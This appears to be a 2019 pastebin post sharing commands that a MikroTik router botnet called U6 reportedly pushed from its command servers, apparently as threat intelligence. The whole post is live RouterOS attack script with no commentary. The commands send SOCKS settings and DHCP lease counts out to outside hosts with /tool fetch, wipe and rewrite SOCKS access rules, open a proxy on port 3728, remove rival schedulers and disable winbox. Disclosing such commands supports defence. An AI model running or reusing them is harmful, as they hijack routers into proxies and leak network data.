U6 - Mikrotik botnet

a guest
Jun 20th, 2019
U6 C2 servers:

Sample of commands pulled from the C2:
{ :local result [ /ip socks print as-value ]; /tool fetch url="http://gamesone.xyz/socks/8a81a096-1fc2-49cf-97f4-8984c579bd05" mode=http http-data=$result;}

{ :local result [ /ip dhcp-server lease print count-only ]; /tool fetch url="http://picsgifs.xyz/clients/b7eca108-d209-41f9-9e94-889de7b54746" mode=http http-data=$result;}

{ :local countRules [/ip socks access print count-only]; :for i from 0 to $countRules step=1 do= {/ip socks access remove $i} }

/ip socks access add src-address=5.188.0.0/15 action=allow
/ip socks access add src-address=192.243.0.0/16 action=allow
/ip socks access add src-address=5.9.0.0/16 action=allow
/ip socks access add src-address=5.104.0.0/16 action=allow
/ip socks access add src-address=0.0.0.0/0 action=deny

/ip firewall filter add action=accept chain=input disabled=no dst-port=3728 protocol=tcp place-before=1

/ip socks set enable=yes
/ip socks set port=3728

/ip dns set servers=8.8.8.8,1.1.1.1

:do { /system scheduler set U6 interval=00:00:15 } on-error={ :put "U6 not found"}

/system scheduler set U6 interval=180s

/system scheduler remove [/system scheduler find where name!=U6]

/ip service disable winbox

/ip socks access add src-address=82.204.203.0/24 action=allow place-before=0

/ip socks access add src-address=192.243.53.0/24 action=allow place-before=0

{ :foreach i in=[/ip firewall nat find action=redirect] do={ /ip firewall nat disable numbers=$i }; };

/ip socks access add src-address=94.130.51.0/24 action=allow place-before=0

{ :foreach i in=[/ip socks access find] do={ :local src [/ip socks access get $i src-address]; /tool fetch url="http://picsgifs.xyz/ips/b7eca108-d209-41f9-9e94-889de7b54746/$src" mode=http; }; };

/ip socks access add src-address=95.213.221.0/24 action=allow place-before=0